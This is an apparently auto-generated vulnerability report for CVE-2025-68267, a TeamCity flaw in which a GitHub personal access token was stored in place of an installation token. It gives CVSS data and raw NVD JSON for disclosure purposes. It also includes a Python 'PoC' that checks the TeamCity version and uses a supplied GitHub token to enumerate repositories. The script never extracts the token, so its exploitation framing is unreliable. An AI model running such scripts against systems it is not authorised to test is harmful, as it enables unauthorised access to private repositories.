Security Vulnerability Report
中文
CVE-2025-68267 CVSS 6.5 MEDIUM

CVE-2025-68267

Published: 2025-12-16 16:16:07
Last Modified: 2025-12-18 19:20:12
Source: [email protected]

Description

In JetBrains TeamCity before 2025.11.1 excessive privileges were possible due to storing GitHub personal access token instead of an installation token

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:jetbrains:teamcity:*:*:*:*:*:*:*:* - VULNERABLE
JetBrains TeamCity < 2025.11.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-68267 PoC - JetBrains TeamCity GitHub Token权限过度 # This PoC demonstrates how TeamCity with excessive privileges can access unauthorized GitHub resources import requests import json from datetime import datetime class TeamCityExcessivePrivilegePoC: def __init__(self, teamcity_url, vulnerable_token): self.teamcity_url = teamcity_url.rstrip('/') self.token = vulnerable_token self.session = requests.Session() def check_vulnerability(self): """Check if TeamCity instance is vulnerable""" print(f"[*] Checking vulnerability status for {self.teamcity_url}") # Check TeamCity version version_url = f"{self.teamcity_url}/app/rest/server/version" try: response = self.session.get(version_url, timeout=10) if response.status_code == 200: version = response.text.strip() print(f"[+] TeamCity Version: {version}") # Check if version is before 2025.11.1 version_parts = version.split('.') if len(version_parts) >= 2: year = int(version_parts[0]) if version_parts[0].isdigit() else 0 month = int(version_parts[1]) if version_parts[1].isdigit() else 0 if year < 2025 or (year == 2025 and month < 11): print("[!] Version is potentially vulnerable") return True except Exception as e: print(f"[-] Error checking version: {e}") return False def enumerate_github_repos(self): """Enumerate GitHub repositories using excessive privileges""" print("\n[*] Attempting to enumerate GitHub repositories...") # GitHub API endpoint to list repositories api_url = "https://api.github.com/user/repos?per_page=100" headers = { "Authorization": f"Bearer {self.token}", "Accept": "application/vnd.github+json", "X-GitHub-Api-Version": "2022-11-28" } try: response = requests.get(api_url, headers=headers, timeout=10) if response.status_code == 200: repos = response.json() print(f"[+] Successfully accessed {len(repos)} repositories") print("[!] This demonstrates excessive privilege - should not have access to all these repos") for repo in repos[:5]: # Show first 5 print(f" - {repo['full_name']} ({repo['visibility']})") return repos else: print(f"[-] Failed to access repos: {response.status_code}") except Exception as e: print(f"[-] Error: {e}") return None def check_token_type(self): """Check if token is Personal Access Token (should be Installation Token)""" print("\n[*] Analyzing token type...") api_url = "https://api.github.com/user" headers = { "Authorization": f"Bearer {self.token}", "Accept": "application/vnd.github+json" } try: response = requests.get(api_url, headers=headers, timeout=10) if response.status_code == 200: user_data = response.json() print(f"[+] Token belongs to user: {user_data.get('login')}") print("[!] This is a Personal Access Token (excessive privileges)") print("[!] Should be using Installation Token instead") return True except Exception as e: print(f"[-] Error: {e}") return False def main(): print("="*60) print("CVE-2025-68267 PoC - JetBrains TeamCity Excessive Privileges") print("="*60) # Configuration teamcity_url = "https://teamcity.example.com" github_token = "ghp_EXAMPLE_TOKEN" # Replace with actual token poc = TeamCityExcessivePrivilegePoC(teamcity_url, github_token) # Check vulnerability if poc.check_vulnerability(): print("\n[!] Target appears to be vulnerable to CVE-2025-68267") # Analyze token poc.check_token_type() # Attempt exploitation poc.enumerate_github_repos() else: print("\n[+] Target may not be vulnerable") if __name__ == "__main__": main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68267", "sourceIdentifier": "[email protected]", "published": "2025-12-16T16:16:06.540", "lastModified": "2025-12-18T19:20:12.023", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In JetBrains TeamCity before 2025.11.1 excessive privileges were possible due to storing GitHub personal access token instead of an installation token"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-272"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:jetbrains:teamcity:*:*:*:*:*:*:*:*", "versionEndExcluding": "2025.11.1", "matchCriteriaId": "549C8763-44C2-4416-9560-E83255B5C99F"}]}]}], "references": [{"url": "https://www.jetbrains.com/privacy-security/issues-fixed/", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.